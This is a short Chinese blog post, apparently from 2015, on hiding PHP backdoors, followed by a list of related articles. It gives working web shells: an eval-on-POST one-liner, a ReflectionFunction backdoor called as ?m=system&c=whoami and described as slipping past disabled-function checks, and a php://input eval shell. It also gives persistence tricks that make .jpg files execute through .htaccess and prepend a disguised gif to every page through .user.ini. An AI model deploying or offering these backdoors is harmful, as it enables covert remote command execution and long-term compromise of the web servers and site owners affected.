php后门隐藏技巧
2015-08-25 10:33
731 查看
一句话 and 大马
phpspy 菜刀一句话<?php@eval($_POST['cmd']);?>反射后门
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>
调用如x.php?m=system&c=whoami
后门也可绕过某些检测禁用system函数的防护系统
php:input
php://input是用来接收post数据(这里有php://input的介绍)<?php
@eval(file_get_contents('php://input'))
?>
Post提交 system('whoami');
.htaccess(需webserver支持)
可以设置任意后缀也可以设置UTF7编码格式shellAddType application/x-httpd-php .jpg
然后再传一个JPG结尾的shell,访问即可执行了
.user.ini(需fastcgi配合)
动态修改php.ini配置文件User.ini
auto_prepend_file:指定在每个PHP页面执行前所要执行的代码
auto_prepend_file=demo.gif (每个页面都会加载demo.gif)
使用php://input (不需要上传额外的文件)(需要自行打开allow_url_include=on 默认为off)
缺点:不支持.user.ini修改allow_url_include (在PHP5时是PHP_INI_SYSTEM。 从PHP5.2.0起可用。)
http://php.net/manual/zh/ini.list.php
http://php.net/manual/zh/configuration.changes.modes.php
本文出自 “Sanr” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1687963
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 使用PHP_UML生成代码的UML图
- php可变参数实现
- thinkphp获取mysql错误
- laravel启动过程简单解析
- phpstorm快捷键
- php - php内置MySQL函数
- php给图片打水印
- 自制FFmpeg SDK并使用output_example测试
- php相对路径的写法
- PHP用iframe实现文件异步上传(无刷新)
- php大力力 [014节] 八杆子打不着的非技术文章,哈哈
- 阅读laravel源代码有感
- laravel sendmail
- php动态调用函数方法&&非关系数据库的优势
- php动态调用函数方法&&非关系数据库的优势
- ThinkPHP使用入门实例
- phpstorm通过ftp远程开发服务器上的项目
- Ubuntu 安装PHP的LDAP扩展时遇到的问题以及解决方案
- php页面出现空白解决方法
- php中mkdir()函数的权限问题(转)